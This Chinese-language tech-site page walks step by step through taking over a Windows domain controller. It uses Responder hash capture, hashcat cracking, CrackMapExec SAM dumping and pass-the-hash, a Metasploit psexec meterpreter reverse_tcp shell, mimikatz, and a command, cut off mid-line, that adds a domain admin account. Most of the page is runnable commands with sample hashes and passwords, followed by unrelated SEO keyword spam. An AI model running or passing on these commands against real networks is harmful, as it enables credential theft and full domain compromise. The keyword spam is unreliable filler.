千家信息网

Responder探测内网获取域控权限总结

发表于:2025-02-06 作者:千家信息网编辑
千家信息网最后更新 2025年02月06日,Responder探测内网获取域控权限总结(1)执行Responder探测内网(https://github.com/lgandx/Responder)./Responder.py -I eth0 -
千家信息网最后更新 2025年02月06日Responder探测内网获取域控权限总结

Responder探测内网获取域控权限总结

(1)执行Responder探测内网(https://github.com/lgandx/Responder)

./Responder.py -I eth0 -rPv

(2)获取172.16.157.133的Responder值

(3)使用Crack Map Exec检查此主机的NetBIOS信息

cme smb 172.16.157.133

(4)使用hashcat对Responder值进行破解

hashcat -m 5600 responder /usr/share/wordlists/rockyou.txt -r /usr/share/rules/d3adhob0.rule

获取密码值Winter2018!

(5)CME扫描

cme smb 172.16.157.133 -u FRONTDESK -p 'Winter2018!' --local-auth

(6)获取本地的管理员帐户对本地密码散列进行dump

cme smb 172.16.157.133 -u FRONTDESK -p 'Winter2018!' --local-auth --sam

(7)获取FRONTDESK密码的NTLM哈希值

FRONTDESK:1002:aad3b435b51404eeaad3b435b51404ee:eb6538aa406cfad09403d3bb1f94785f:::

(8)哈希传递方式查看本地网络的smb权限情况

cme smb 172.16.157.0/24 -u administrator -H 'aad3b435b51404eeaad3b435b51404ee:5509de4ff0a6eed7048d9f4a61100e51' --local-


auth

(9)可以登录172.16.157.134服务器

(10)对172.16.157.134进行查看,该计算机具备域控权限

cme smb 172.16.157.134

(11)msf下面利用smb口令进行shell获取

use exploit/windows/smb/psexec

set smbpass=aad3b435b51404eeaad3b435b51404ee:5509de4ff0a6eed7048d9f4a61100e51

set smbuser administrator

set playload windows/x64/meterpreter/reverse_tcp

run

getuid

(12)使用mimikatz获取域控密码

load mimikatz

kerberos

cme smb 172.16.157.135 -u administrator -p 'October17' -x 'net user markitzeroda hackersPassword! /add /domain /y && net group "domain admins" markitzeroda


密码 权限 探测 哈希 主机 信息 口令 帐户 情况 方式 服务器 管理员 网络 计算机 服务 检查 登录 管理 数据库的安全要保护哪些东西 数据库安全各自的含义是什么 生产安全数据库录入 数据库的安全性及管理 数据库安全策略包含哪些 海淀数据库安全审计系统 建立农村房屋安全信息数据库 易用的数据库客户端支持安全管理 连接数据库失败ssl安全错误 数据库的锁怎样保障安全 mta数据库管理证书含金量多少 软件开发创业产品呈现 闵行区综合软件开发服务收费 服务器开机自检不过键盘不亮 网络安全战队是什么意思 预防过度沉迷网络安全教育 国企网络安全发言材料 泰安戴尔服务器代理测评 宁波桌面软件开发需要学什么 方舟多人服务器创建 网络安全宣传周主题对照检查 如何对默认数据库设置权限 科学引文数据库sci是什么 传奇单机版服务器下载 杨中科老师讲数据库 vue不打包怎么部署到服务器 学网络安全考什么证书 网络视频服务器如何改地址 网络安全sci一区 安卓软件开发课程设计总结 传真服务器ip 宁波江北区戴尔机架式服务器 网络安全法要求我国所有数据 网络安全改造售后服务方案 网络安全战队是什么意思 麦块我的世界空岛世界服务器 华为网络技术题库简答题 筑志软件开发有限公司 工行软件开发部门好吗 网络安全海报又简单又好看
0